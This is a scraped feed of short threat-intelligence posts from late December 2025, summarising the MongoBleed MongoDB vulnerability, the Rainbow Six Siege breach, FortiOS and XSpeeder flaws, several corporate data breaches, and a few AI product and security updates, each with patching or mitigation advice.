A new mongobleed PoC exploits CVE-2025-14847 by abusing MongoDB's zlib decompression handling (inflated uncompressedSize) to leak uninitialized heap memory over the network, potentially exposing internal configs, system stats, paths and client details; patch to fixed MongoDB releases (e.g. 8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32) and watch for scanning on [-----].
🕷 Malware: mongobleed (PoC exploit tool) 🎯 Target: Global/Database Infrastructure (MongoDB Cloud & Container Deployments) # Category: #MongoDB" [X Link](https://x.com/ThreatSynop/status/2004977713421881660) 2025-12-27T18:08Z [--] followers, [---] engagements

"🚨 MongoBleed (CVE-2025-14847): Unauthenticated Heap-Memory Leak Hits MongoDB Servers
MongoBleed abuses MongoDB's zlib compression handling to leak uninitialized heap memory to unauthenticated remote clients, potentially exposing in-memory sensitive data and aiding follow-on exploitation. Patch to fixed MongoDB versions (e.g.
8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until upgraded.
🕷 Malware: N/A 🎯 Target: Global/Databases & Backend Infrastructure # Category: #MongoDB #MongoBleed #CVE202514847 #Vulnerability #InfoDisclosure #Zlib #DatabaseSecurity" [X Link](https://x.com/ThreatSynop/status/2005128829161943238) 2025-12-28T04:09Z [--] followers, [---] engagements

"🚨 Rainbow Six Siege Breach Grants Billions of R6 Credits, Forces Ubisoft Shutdown
Attackers abused internal moderation/marketplace systems to ban/unban players, spoof ban-ticker messages and grant 2B R6 Credits/Renown plus unlock cosmetics, prompting Ubisoft to take Siege and the Marketplace offline and roll back transactions since 11:00 UTC.
🕷 Malware: N/A 🎯 Target: Global/Gaming (Ubisoft Rainbow Six Siege) # Category: #Ubisoft #RainbowSixSiege #CyberAttack #GameSecurity #AccountAbuse #IncidentResponse #SupplyChain 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005189288556650988) 2025-12-28T08:09Z [--] followers, [---] engagements

"🚨 Ubisoft Confirms Rainbow Six Siege Abuse After Breach Grants Billions of In-Game Credits
Attackers reportedly compromised Siege's backend/admin tooling to mass-grant 2B R6 Credits/Renown, issue bans/unbans and unlock cosmetics, forcing Ubisoft to take servers and the Marketplace offline and roll back impacted transactions while investigating. The incident highlights how privileged tooling abuse (even without malware) can cause large-scale fraud and service disruption.
🕷 Malware: N/A 🎯 Target: Global/Gaming (Ubisoft Rainbow Six Siege) # Category: #Ubisoft #RainbowSixSiege #CyberAttack" [X Link](https://x.com/ThreatSynop/status/2005219548987797807) 2025-12-28T10:09Z [--] followers, [----] engagements

"🚨 Security Affairs Newsletter Round 556: LangChain LangGrinch, MongoDB CVE-2025-14847 and Trust Wallet Fallout
This weekly roundup consolidates high-impact late-December threats, including the LangChain-core serialization injection bug enabling secret theft, MongoDB's unauthenticated heap-memory leak (CVE-2025-14847) and the Trust Wallet Chrome extension incident, plus additional breach/hacktivism and supply-chain updates. Use it as a rapid triage list to prioritize patching, credential rotation and monitoring for exploitation across common enterprise and developer stacks.
🕷 Malware: N/A 🎯" [X Link](https://x.com/ThreatSynop/status/2005227162287108459) 2025-12-28T10:39Z [--] followers, [---] engagements

"🚨 Troy Hunt Weekly Update 484: IoT Shelly Nirvana, Ubiquiti, Physical-to-Digital Security and Travel Notes
Troy's latest weekly update recaps upcoming travel, lessons learned while hardening a home IoT setup (Shelly ecosystem) and how physical security overlaps with network security using Ubiquiti; useful reminders that smart environments expand the attack surface across both physical and digital layers.
🕷 Malware: N/A 🎯 Target: Global/Infosec + IoT & Physical Security # Category: #ThreatIntel #IoT #PhysicalSecurity #Ubiquiti #HomeLab #SecurityAwareness #Cybersecurity 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005242867963355493) 2025-12-28T11:42Z [--] followers, [--] engagements

"🚨 MongoDB CVE-2025-14847: Unauthenticated Heap-Memory Leak via zlib Compression
A MongoDB server-side zlib compression flaw can let unauthenticated clients trigger responses containing uninitialized heap memory, risking exposure of sensitive in-memory data and accelerating follow-on exploitation; patch to fixed versions (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until upgraded.
🕷 Malware: N/A 🎯 Target: Global/Databases & Backend Infrastructure # Category: #MongoDB #CVE202514847 #Vulnerability #InfoDisclosure #Zlib #DatabaseSecurity #PatchManagement 🔗" [X Link](https://x.com/ThreatSynop/status/2005582660119257230) 2025-12-29T10:12Z [--] followers, [--] engagements

"🚨 MongoBleed Exploited in the Wild: 87K Exposed MongoDB Servers at Risk of Secret Leakage
Attackers are actively exploiting MongoBleed (CVE-2025-14847) to remotely leak uninitialized heap memory from MongoDB via zlib compression, potentially exposing credentials, API/cloud keys, session tokens and internal configs from internet-exposed instances. Patch immediately (fixed builds available since Dec 19) and hunt for abnormal high-volume connections in MongoDB logs, as exploitation can be stealthy and hard to see in SIEMs.
🕷 Malware: N/A 🎯 Target: Global/Database Infrastructure (MongoDB) #" [X Link](https://x.com/ThreatSynop/status/2005583812319678965) 2025-12-29T10:16Z [--] followers, [--] engagements

"🚨 MongoBleed (CVE-2025-14847) Exploited After PoC Release, 87K+ MongoDB Servers Exposed
SecurityWeek reports threat actors began exploiting the unauthenticated MongoDB zlib flaw shortly after technical details and a PoC were released, enabling remote leakage of uninitialized heap memory (session tokens, passwords, API keys). Patch to fixed MongoDB versions (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression, and hunt logs for pre-auth exploitation attempts.
🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (Internet-Exposed) # Category: #MongoDB #MongoBleed" [X Link](https://x.com/ThreatSynop/status/2005591981502722366) 2025-12-29T10:49Z [--] followers, [--] engagements

"🚨 Superagent: Open-Source Guardrails Framework to Control Agentic AI in Production
Superagent helps teams run AI agents with enforced permissions, runtime guardrails and full execution logging for auditability and incident response. A built-in Safety Agent evaluates prompts, tool calls and outputs in real time against declarative policies to block or modify risky actions before they execute.
🕷 Malware: N/A 🎯 Target: Global/Enterprise (Agentic AI, DevSecOps, AppSec) # Category: #AgenticAI #AISecurity #LLMSecurity #Guardrails #DevSecOps #AppSec #OpenSource #Governance #Observability 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005593621316169759) 2025-12-29T10:55Z [--] followers, [--] engagements

"🚨 MongoBleed Detector Released: Offline Tool Spots CVE-2025-14847 Exploitation in MongoDB Logs
An open-source agentless detector (by Neo23x0) scans MongoDB logs offline to flag MongoBleed exploitation by correlating connection/metadata/termination events (IDs 22943/51800/22944) and spotting the key anomaly: high-volume connections that never send client metadata.
This matters because it enables rapid IR triage across many hosts (including rotated .gz logs) and prioritizes likely-active exploitation using severity thresholds (e.g. [---] conns, 10% metadata, 400/min bursts).
🕷 Malware: N/A 🎯" [X Link](https://x.com/ThreatSynop/status/2005596357092905382) 2025-12-29T11:06Z [--] followers, [--] engagements

"🚨 MongoBleed Detector Released: Offline Log Scanner Flags CVE-2025-14847 Exploitation
The new open-source MongoBleed detector scans MongoDB JSON logs offline to spot exploitation patterns by correlating connection accepted (22943), client metadata (51800) and connection closed (22944) events, flagging high-volume bursts where attackers extract memory and disconnect without sending metadata. It supports compressed logs, IPv4/IPv6, severity scoring (HIGH/MEDIUM/LOW/INFO) and optional SSH-based remote scanning to triage fleets quickly.
🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (4.4-8.2.2) #" [X Link](https://x.com/ThreatSynop/status/2005598056503214138) 2025-12-29T11:13Z [--] followers, [--] engagements

"🚨 MongoBleed Exploited in the Wild: Pre-Auth MongoDB Memory Leak Exposes Secrets
MongoDB's CVE-2025-14847 is now actively exploited, letting unauthenticated attackers abuse zlib message decompression (length-field mishandling) to extract uninitialized heap memory that may contain credentials and other sensitive data from internet-exposed servers. Upgrade immediately to fixed releases (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until patched.
🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (Internet-Exposed) # Category: #MongoDB #MongoBleed #CVE202514847" [X Link](https://x.com/ThreatSynop/status/2005599702549483571) 2025-12-29T11:20Z [--] followers, [--] engagements

"🚨 MongoBleed Exploited in the Wild: Pre-Auth MongoDB Memory Leak Exposes Secrets
MongoDB's CVE-2025-14847 is now actively exploited, letting unauthenticated attackers abuse zlib message decompression (length-field mishandling) to extract uninitialized heap memory that may contain credentials and other sensitive data from internet-exposed servers. Upgrade immediately to fixed releases (8.2.3 / 8.0.17 / 7.0.28 / 6.0.27 / 5.0.32 / 4.4.30) or disable zlib compression until patched.
🕷 Malware: N/A 🎯 Target: Global/MongoDB Servers (Internet-Exposed) # Category: #MongoDB #MongoBleed #CVE202514847" [X Link](https://x.com/ThreatSynop/status/2005629909775819119) 2025-12-29T13:20Z [--] followers, [--] engagements

"🚨 Fortinet Warns: 5-Year-Old FortiOS SSL-VPN 2FA Bypass Still Actively Exploited (CVE-2020-12812)
Attackers can bypass FortiToken 2FA on vulnerable FortiGate SSL-VPN by changing the username's letter case in specific local user + LDAP group configurations, effectively authenticating without a second factor. Patch immediately (fixed FortiOS builds available since 2020) and remove unnecessary secondary LDAP groups / disable username case-sensitivity if you cannot upgrade.
🕷 Malware: N/A 🎯 Target: Global/Organizations Running FortiGate SSL-VPN with LDAP + 2FA # Category: #Fortinet #FortiOS" [X Link](https://x.com/ThreatSynop/status/2005631547567739301) 2025-12-29T13:26Z [--] followers, [--] engagements

"🚨 Microsoft Copilot Adds GPT-5.2 as New Smart Plus Mode
Microsoft is rolling out GPT-5.2 (a Thinking variant) in Copilot across web, Windows and mobile as a free upgrade alongside GPT-5.1. The update aims to improve complex reasoning and knowledge-work tasks like document analysis, coding and generating spreadsheets/presentations.
🕷 Malware: N/A (AI model rollout: GPT-5.2) 🎯 Target: Global/Productivity (Microsoft Copilot users) # Category: #Microsoft #Copilot #AI #GPT52 #GenAI #Windows #ProductUpdate 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005634820127260703) 2025-12-29T13:39Z [--] followers, [--] engagements

"🚨 Coupang Announces $1.17B Voucher Payout After 33.7M-Account Data Breach
Coupang says an intrusion (discovered Nov 18) exposed customer PII, including names, phone numbers, delivery/email addresses and some order histories, impacting up to [----] million Korea-based accounts. Starting Jan [--] [----] it will issue [-----] vouchers per affected user ($1.17B total), underscoring the scale of large-platform PII exposure and the business/regulatory fallout of voucher-based remediation.
🕷 Malware: N/A 🎯 Target: South Korea / E-commerce (Coupang customers) # Category: #DataBreach #Coupang #Privacy #PII" [X Link](https://x.com/ThreatSynop/status/2005634886170800344) 2025-12-29T13:39Z [--] followers, [--] engagements

"🚨 Aflac Data Breach Exposes 22.65M Records After June [----] Intrusion
Aflac says attackers accessed and exfiltrated data tied to [-----] million individuals after suspicious activity was detected on June [--] [----], impacting customers, beneficiaries, employees and agents; no ransomware encryption was observed. Stolen data includes SSNs, DOB, addresses, driver's license/government IDs and medical/health insurance info, raising high identity-theft and medical-fraud risk and aligning with a broader campaign hitting the insurance sector.
🕷 Malware: N/A 🎯 Target: USA / Insurance # Category: #DataBreach" [X Link](https://x.com/ThreatSynop/status/2005636519780893111) 2025-12-29T13:46Z [--] followers, [--] engagements

"🚨 Malware in [----] Breaks Out of Windows: Android Banking Trojans + macOS ClickFix Surge
Malwarebytes reports 2025's malware shifted heavily to Android and macOS, highlighting advanced Android banking trojans using overlays and human-like interaction tricks, plus the ClickFix social-engineering technique spreading macOS stealers. The trend is accelerated by cross-platform malware built in Rust/Go and MaaS ecosystems expanding reach to mobile, Linux and IoT.
🕷 Malware: Multiple (Herodotus, Lumma, AMOS, Rhadamanthys) 🎯 Target: Global / Mobile & macOS Users # Category: #Malware #Android #macOS" [X Link](https://x.com/ThreatSynop/status/2005637068387471651) 2025-12-29T13:48Z [--] followers, [--] engagements

"🚨 Check Point Weekly Threat Intel: Major Breaches, Critical Vulns and Active Phishing/Malware Campaigns
Check Point's Dec [--] bulletin highlights disruptive incidents (ransomware encrypting Romanian Waters' IT estate, a La Poste outage claimed by NoName057(16) and Aflac's 22.7M-record breach) alongside high-impact flaws in MongoDB (MongoBleed), LangChain Core deserialization and Net-SNMP snmptrapd. It also flags active campaigns abusing Google Cloud Send Email workflows for credential phishing and long-running MgBot/Webrat activity delivered via DNS poisoning and fake GitHub PoCs.
🕷 Malware: MgBot" [X Link](https://x.com/ThreatSynop/status/2005637617031770215) 2025-12-29T13:50Z [--] followers, [--] engagements

"🚨 Coupang Recovers Smashed Laptop Allegedly Used in Insider Data Breach
Coupang says it recovered a smashed laptop, reportedly weighted down and dumped in a river, linked to an alleged insider leak and handed it to authorities as part of the investigation. The case underscores how insider access plus attempted evidence destruction can complicate breach containment, attribution and legal response.
🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #InsiderThreat #DigitalForensics #IncidentResponse #EvidenceHandling #Coupang #SouthKorea 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005646386130194867) 2025-12-29T14:25Z [--] followers, [--] engagements

"🚨 Korean Air Employee Data Exposed After KC&D Supplier Hack Linked to Clop
Korean Air disclosed that a breach at its catering partner KC&D exposed employee data stored in an ERP system, including names and bank account numbers, with local reporting suggesting [-----] records were exfiltrated. Clop has claimed responsibility and allegedly published the stolen data, increasing risk of targeted fraud and impersonation attempts against staff.
🕷 Malware: Clop (ransomware/extortion gang) 🎯 Target: South Korea / Aviation (Employees) # Category: #DataBreach #KoreanAir #Clop #Extortion #OracleEBS" [X Link](https://x.com/ThreatSynop/status/2005646935714074674) 2025-12-29T14:27Z [--] followers, [--] engagements

"🚨 [--] Threats That Shaped Cybersecurity in 2025: From Telecom Espionage to React2Shell
Dark Reading outlines five defining threats: China-linked Salt Typhoon's ongoing telecom intrusions, major CISA budget/layoff impacts, the critical React2Shell (CVE-2025-55182) deserialization flaw, self-propagating open-source malware like Shai-Hulud, and supply-chain-style attacks abusing Salesforce integrations and OAuth tokens.
🕷 Malware: Shai-Hulud 🎯 Target: Global / Enterprise (Telecom + SaaS ecosystems) # Category: #ThreatIntel #SaltTyphoon #APT #CISA #React2Shell #CVE2025-55182 #Vulnerability" [X Link](https://x.com/ThreatSynop/status/2005647480591982981) 2025-12-29T14:29Z [--] followers, [--] engagements

"🚨 Fortinet Warns of New Attacks Exploiting Old FortiOS 2FA Bypass (CVE-2020-12812)
Fortinet reports renewed exploitation of CVE-2020-12812, where attackers can bypass FortiOS two-factor authentication in certain LDAP/remote-auth configurations by altering username case to avoid the 2FA prompt.
This matters because it enables account compromise of FortiGate access paths (often internet-exposed), accelerating follow-on intrusion activity if admins haven't patched or hardened affected setups.
🕷 Malware: N/A 🎯 Target: Global / Enterprise (FortiOS/FortiGate deployments) # Category: #Fortinet" [X Link](https://x.com/ThreatSynop/status/2005648025058787375) 2025-12-29T14:32Z [--] followers, [--] engagements

"🚨 MongoBleed Exploited in the Wild: 87K+ MongoDB Servers Potentially Exposed
Researchers report active exploitation of MongoBleed (CVE-2025-14847), a zlib decompression flaw that lets unauthenticated attackers leak uninitialized heap memory from MongoDB, risking exposure of secrets like credentials, tokens and API keys. Patch immediately (fixed builds include 8.2.3/8.0.17/7.0.28/6.0.27/5.0.32/4.4.30) or disable zlib compression as a short-term mitigation.
🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / MongoDB (exposed database servers) # Category: #MongoDB #MongoBleed #CVE2025_14847" [X Link](https://x.com/ThreatSynop/status/2005648569060008286) 2025-12-29T14:34Z [--] followers, [--] engagements

"🚨 K3 UltraMulti EDC Keychain Tool Review: Flashlight + UV + Laser + Igniter in a Pocket Gadget
A compact (40g) keychain tool combining an 800-lumen beam, 365nm UV, red laser, side flood/RGB lights, magnetic mount/clip, USB-C recharge and a short-duration ignition module. The main value is always-on-you utility, but treat the igniter and laser as safety/compliance considerations depending on your environment.
🕷 Malware: N/A 🎯 Target: Global / Consumer EDC # Category: #EDC #Multitool #Flashlight #UVLight #LaserPointer #EverydayCarry #Gadgets 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005711207102042189) 2025-12-29T18:43Z [--] followers, [--] engagements

"🚨 Korean Air Employee Data Exposed After KC&D Supplier Breach Linked to Clop
Korean Air says its former catering/duty-free unit KC&D was hacked, leaking employee data (including names and bank account numbers) from an ERP server, with [-----] staff potentially affected. Clop has claimed responsibility, reinforcing how third-party compromises can quickly translate into high-risk fraud and impersonation exposure for employees.
🕷 Malware: Clop (ransomware/extortion gang) 🎯 Target: South Korea / Aviation (Employees) # Category: #DataBreach #KoreanAir #Clop #ThirdPartyRisk #SupplyChainAttack #ERP" [X Link](https://x.com/ThreatSynop/status/2005711752609063134) 2025-12-29T18:45Z [--] followers, [--] engagements

"🚨 Weekly Recap: MongoDB Attacks, Wallet Breaches, Android Spyware, Insider Crime & More
This weekly recap rounds up late-2025 threats, including active exploitation of MongoDB MongoBleed (CVE-2025-14847), a Trust Wallet Chrome extension compromise, Evasive Panda DNS poisoning to deliver MgBot and renewed FortiOS 2FA-bypass abuse, showing how attackers are chaining old flaws, SaaS keys and supply-chain exposure faster than defenders patch.
🕷 Malware: MongoBleed (CVE-2025-14847), MgBot 🎯 Target: Global / Multi-sector # Category: #ThreatIntel #MongoDB #MongoBleed #CVE2025_14847 #TrustWallet" [X Link](https://x.com/ThreatSynop/status/2005713389931118974) 2025-12-29T18:51Z [--] followers, [---] engagements

"🚨 Linux & Open Source [----] Outlook: Desktop Growth, Rust Momentum and a Firefox Cliff
The article forecasts continued Linux desktop growth in [----], stronger open-source security and wider use of AI to assist (not replace) Linux kernel development, while warning Firefox faces serious pressure.
This matters because rising adoption and supply-chain complexity will force faster hardening, better maintenance and clearer trust signals across core open-source projects.
🕷 Malware: N/A 🎯 Target: Global / Linux & Open Source Ecosystem # Category: #Linux #OpenSource #Cybersecurity #Rust #DesktopLinux #AI" [X Link](https://x.com/ThreatSynop/status/2005713451050573825) 2025-12-29T18:52Z [--] followers, [--] engagements

"🚨 Critical XSpeeder 0-Day (CVE-2025-54322) Exposes 70K Edge Devices as Vendor Stays Silent
Researchers disclosed an unauthenticated 0-day in XSpeeder SXZOS where injecting payloads into the chkid parameter of can yield remote command execution with full root control. With no patch after 7+ months of disclosure attempts and [-----] devices exposed online, this enables rapid network takeover, traffic interception and disruption in industrial/branch environments.
🕷 Malware: CVE-2025-54322 (XSpeeder SXZOS 0-day RCE) 🎯 Target: Global / Industrial & Branch Networks (Routers, SD-WAN, Edge devices) #" [X Link](https://x.com/ThreatSynop/status/2005713994057654710) 2025-12-29T18:54Z [--] followers, [--] engagements

"🚨 Trust Wallet: [----] Wallets Drained After Malicious Chrome Extension Update
Attackers compromised Trust Wallet's Chrome extension v2.68.0 by injecting malicious JavaScript that exfiltrated wallet data, leading to roughly $7M stolen from [----] wallet addresses. Trust Wallet urges immediate updates to v2.69, warns of follow-on phishing scams and says it is reimbursing verified victims.
🕷 Malware: Malicious Trust Wallet Chrome extension v2.68.0 (JS data exfiltration) 🎯 Target: Global / Crypto users (Chrome extension) # Category: #TrustWallet #CryptoTheft #SupplyChainAttack #BrowserExtension" [X Link](https://x.com/ThreatSynop/status/2005715082748280903) 2025-12-29T18:58Z [--] followers, [--] engagements

"🚨 ChatGPT Mobile Adds Thinking Time Toggle for Standard vs Extended Reasoning
OpenAI is rolling out a mobile update that finally lets Plus users choose between Standard and Extended Thinking, aligning the Android experience with desktop for deeper, longer reasoning on complex prompts. The change matters because it makes more compute when needed a user-controlled setting on mobile, reducing silent downgrades and improving output consistency across devices.
🕷 Malware: N/A 🎯 Target: Global / AI Productivity (ChatGPT mobile users) # Category: #OpenAI #ChatGPT #MobileSecurity #AI #LLM" [X Link](https://x.com/ThreatSynop/status/2005715689282457864) 2025-12-29T19:00Z [--] followers, [--] engagements

"🚨 Top US Accounting Firm Sax Discloses [----] Breach Impacting 220,000+
Sax LLP says hackers accessed its network in late July/August [----] and stole files affecting [------] people, with exposed data potentially including SSNs, DOB, driver's license/state IDs and passport numbers. The 16-month disclosure delay increases identity-theft risk because stolen PII is typically monetized quickly.
🕷 Malware: N/A 🎯 Target: USA / Accounting & Advisory (Clients/Individuals) # Category: #DataBreach #PII #IdentityTheft #Accounting #US #IncidentResponse #RiskManagement 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005716843600756753) 2025-12-29T19:05Z [--] followers, [--] engagements

"🚨 Hacker Dumped MacBook in River to Destroy Evidence in Coupang Data Theft Case
Investigators say a former Coupang employee attempted to destroy evidence of a major data-theft incident by throwing a MacBook Air into a river, but authorities recovered the device for forensic analysis.
The case underscores how insider access plus attempted evidence destruction can complicate attribution, containment and legal response.
🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #InsiderThreat #DigitalForensics #IncidentResponse #EvidenceHandling #Coupang 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005717388436677031) 2025-12-29T19:07Z [--] followers, [--] engagements

"🚨 2.5M+ Exploit Attempts Slam Adobe ColdFusion Servers in Holiday Attack Wave
Researchers observed a coordinated campaign firing 2.5+ million malicious requests, timed heavily on Christmas Day, probing Adobe ColdFusion and [--] other stacks across [---] vulnerabilities. The actors used out-of-band callbacks (Interactsh) and targeted multiple ColdFusion RCE/bypass CVEs (e.g. CVE-2023-26359, CVE-2023-38205, CVE-2023-44353), consistent with initial-access-broker style scanning to quickly identify systems for follow-on compromise.
🕷 Malware: N/A (ProjectDiscovery Interactsh OAST + exploit-scanning) 🎯" [X Link](https://x.com/ThreatSynop/status/2005717450717905132) 2025-12-29T19:07Z [--] followers, [--] engagements

"🚨 Critical XSpeeder SXZOS Zero-Day RCE Exposes 70,000+ Internet-Facing Network Devices
A pre-auth zero-day (CVE-2025-54322) in XSpeeder SXZOS networking devices enables unauthenticated attackers to execute arbitrary commands as root via a vulnerable web auth endpoint that unsafely eval()s base64-decoded input. With no patch available and tens of thousands of exposed hosts (common in industrial/branch environments), this is a high-probability mass-exploitation risk for initial access and full device takeover.
🕷 Malware: CVE-2025-54322 (XSpeeder SXZOS pre-auth Root RCE) 🎯 Target: Global /" [X Link](https://x.com/ThreatSynop/status/2005725062612300220) 2025-12-29T19:38Z [--] followers, [--] engagements

"🚨 Airoha Bluetooth Headphone Flaws Let Attackers Hijack Paired Smartphones
Three bugs (CVE-2025-20700/20701/20702) in Airoha's RACE protocol allow nearby attackers to connect without authentication, gain arbitrary memory read/write and extract the Bluetooth link key to impersonate trusted headphones. This can enable call/audio hijacking, contact/call-log access and voice-assistant abuse on connected phones.
🕷 Malware: Airoha RACE protocol vulnerabilities (CVE-2025-20700, CVE-2025-20701, CVE-2025-20702) 🎯 Target: Global / Bluetooth Headphones & Connected Smartphones # Category: #Bluetooth" [X Link](https://x.com/ThreatSynop/status/2005725607272059382) 2025-12-29T19:40Z [--] followers, [--] engagements

"🚨 Ubisoft Confirms Rainbow Six Siege Server Intrusion Tied to MongoBleed (CVE-2025-14847)
Attackers exploited the MongoBleed MongoDB memory-disclosure flaw to tamper with Rainbow Six Siege infrastructure, triggering mass account manipulation (credits/skins), ban-system abuse and service disruption. Reports also indicate follow-on actors may have leveraged the same weakness to steal large volumes of internal data, escalating long-term IP and cheat-development risk.
🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Gaming (Ubisoft Rainbow Six Siege) # Category: #Ubisoft #RainbowSixSiege" [X Link](https://x.com/ThreatSynop/status/2005726702815560045) 2025-12-29T19:44Z [--] followers, [---] engagements

"🚨 AI-Powered Mycelial Mage Phishing Kit Targets Microsoft Outlook Credentials
A Spanish-language phishing kit dubbed Mycelial Mage is stealing Outlook logins, enriching them with IP/geolocation and exfiltrating via Telegram bots and increasingly via Discord webhooks to reduce forensic visibility.
The toolkit also adds anti-analysis defenses (devtools traps, console hijacking, regex backtracking) and shows signs of AI-assisted module development.
🕷 Malware: Mycelial Mage (phishing kit) 🎯 Target: Global / Microsoft Outlook users (Spanish-speaking regions) # Category: #Phishing #CredentialTheft" [X Link](https://x.com/ThreatSynop/status/2005727246162559039) 2025-12-29T19:46Z [--] followers, [--] engagements

"🚨 OpenAI Hardens ChatGPT Atlas to Resist Prompt-Injection Attacks
OpenAI rolled out a security update for its browser-based ChatGPT Atlas agent that combines an adversarially trained model with stronger safeguards to detect and block prompt-injection attempts. The company is also scaling automated reinforcement-learning red teaming to discover novel multi-step attack strategies early and ship mitigations faster.
🕷 Malware: N/A 🎯 Target: Global / AI Agents (Browser-based automation) # Category: #OpenAI #ChatGPT #Atlas #PromptInjection #AgenticAI #AIsecurity #RedTeaming #AppSec 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005728339676614673) 2025-12-29T19:51Z [--] followers, [--] engagements

"🚨 2.5M+ Holiday Exploit Probes Hit Adobe ColdFusion in Coordinated Recon Campaign
A threat actor ran a Christmas-week scanning operation generating 2.5M+ malicious requests across 47+ platforms, including [----] ColdFusion-focused requests across [--] countries (68% of sessions in the U.S.). The campaign abused WDDX deserialization to trigger JNDI/LDAP injection (JdbcRowSetImpl gadget chain) and used Interactsh/OAST domains for callback verification, classic initial-access-broker recon ahead of downstream intrusions.
🕷 Malware: N/A (exploit scanning; Interactsh/Nuclei-like tooling) 🎯 Target:" [X Link](https://x.com/ThreatSynop/status/2005729429465526433) 2025-12-29T19:55Z [--] followers, [--] engagements
"🚨 Bluetooth Headphone Flaws Let Attackers Hijack Connected Smartphones. Researchers disclosed three Airoha SoC issues (CVE-2025-20700/20701/20702) that allow nearby attackers to access the RACE protocol without proper authentication, then extract the Bluetooth Link Key and impersonate trusted headphones to abuse the paired phone. This can enable covert eavesdropping and actions like call/audio hijack and voice-assistant abuse across popular brands. 🕷 Malware: N/A (Airoha RACE protocol vulnerabilities: CVE-2025-20700, CVE-2025-20701, CVE-2025-20702) 🎯 Target: Global / Bluetooth Headphones &" [X Link](https://x.com/ThreatSynop/status/2005729973982917064) 2025-12-29T19:57Z [--] followers, [--] engagements
"🚨 Hacktivist Proxy Ops Become a Repeatable Playbook for Geopolitical Cyber Pressure. A report highlights a repeatable model where hacktivist campaigns surge immediately after geopolitical triggers (sanctions, military aid, diplomatic events), using low-complexity DDoS/defacement/claimed leaks to maximize public disruption and plausible deniability. The risk is sustained operational and psychological pressure on public-facing services (gov, finance, transport, media) that forces reactive defense and drains IR capacity. 🕷 Malware: N/A 🎯 Target: Global / Government & Critical Services # Category:" [X Link](https://x.com/ThreatSynop/status/2005730522836918521) 2025-12-29T19:59Z [--] followers, [--] engagements
"🚨 Coupang Data Breach Suspect Dumped MacBook in River; Investigators Recovered It. The suspected actor behind Coupang's personal data leak allegedly threw a MacBook Air into a river to destroy evidence, but it was recovered and is being used for forensic investigation.
The case highlights how insider-driven breaches often include anti-forensics, making rapid evidence preservation critical for attribution and legal action. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #Coupang #InsiderThreat #DigitalForensics #IncidentResponse #EvidenceHandling #SouthKorea 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005731073129320811) 2025-12-29T20:02Z [--] followers, [--] engagements
"🚨 Aflac Data Breach Exposes 22M People in Major Cyber Breach. Aflac confirmed a June [----] intrusion impacted [--] million people, exposing sensitive PII and medical/claims-related data across customers, employees, agents, and beneficiaries. The company says it contained the attack quickly and is offering impacted individuals two years of identity/medical-fraud protection services. 🕷 Malware: N/A 🎯 Target: USA / Insurance # Category: #DataBreach #Aflac #PII #HealthData #IdentityTheft #MedicalFraud #IncidentResponse #Cybercrime 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005762969209328071) 2025-12-29T22:08Z [--] followers, [--] engagements
"🚨 AI Slop and Brainrot Are Flooding YouTube Shorts, and the Algorithm Is Rewarding It. A Kapwing analysis found that roughly [--] in [--] Shorts shown to new users qualifies as low-quality AI-generated slop, while about a third of early recommendations fall into brainrot attention-farming content. The report argues the incentives (cheap production + reliable reach) are accelerating spam-like content factories, degrading discovery quality and increasing misinformation risk at scale.
🕷 Malware: N/A 🎯 Target: Global / Social Media (YouTube) # Category: #AISlop #Brainrot #YouTubeShorts #ContentIntegrity" [X Link](https://x.com/ThreatSynop/status/2005764117882364138) 2025-12-29T22:13Z [--] followers, [--] engagements
"🚨 Ubisoft Shuts Down Rainbow Six Siege After MongoDB Exploit Hits Players. Attackers abused the MongoBleed MongoDB memory-leak flaw to compromise Rainbow Six Siege backend systems, enabling disruptive actions like mass credit grants, bans/unbans, and in-game manipulation. The incident shows how a single internet-exposed database weakness can translate into full platform-level takeover and large-scale user impact. 🕷 Malware: MongoBleed (CVE-2025-14847) 🎯 Target: Global / Gaming (Ubisoft Rainbow Six Siege players) # Category: #Ubisoft #RainbowSixSiege #MongoDB #MongoBleed #CVE2025_14847 #Exploit" [X Link](https://x.com/ThreatSynop/status/2005773363877146781) 2025-12-29T22:50Z [--] followers, [---] engagements
"🚨 Coupang to Pay $1.1B in Vouchers After Massive Customer Data Breach. Coupang announced a 1.685T ($1.1B) voucher compensation plan for 33.7M notified accounts after a major personal data exposure, with distribution starting January [--] [----]. The move underscores the scale of breach fallout in large consumer platforms, where remediation costs, regulatory scrutiny, and trust erosion can exceed the technical incident itself. 🕷 Malware: N/A 🎯 Target: South Korea / E-commerce # Category: #DataBreach #Coupang #Privacy #PII #SouthKorea #Ecommerce #IncidentResponse 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2005773908067184655) 2025-12-29T22:52Z [--] followers, [--] engagements
"🚨 Elevation Lab TimeCapsule Review: Give AirTags a 5-Year Battery Without the Bulk. Elevation Lab's compact TimeCapsule replaces the AirTag's CR2032 with AAA lithium cells in an IP69-sealed case, extending battery life to [--] years while keeping the tracker usable for travel/gear tracking.
